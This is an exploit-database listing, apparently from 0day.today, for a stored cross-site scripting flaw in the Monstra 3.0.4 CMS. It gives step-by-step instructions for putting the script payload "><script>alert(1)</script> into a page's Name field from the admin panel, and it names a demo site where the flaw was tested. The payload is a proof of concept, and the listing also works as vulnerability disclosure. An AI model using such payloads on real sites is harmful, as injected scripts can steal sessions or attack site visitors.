[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Monstra 3.0.4 - Stored Cross-Site Scripting Vulnerability

Author
tmrswrr
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38789
Category
web applications
Date add
17-06-2023
Platform
php
# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested : https://www.softaculous.com/softaculous/demos/Monstra


--- Description ---

1) Login admin panel and go to Pages: 
https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages 
2) Click edit button and  write your payload in the Name field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button
https://demos3.softaculous.com/Monstraggybvrnbr4/

#  0day.today [2024-11-16]  #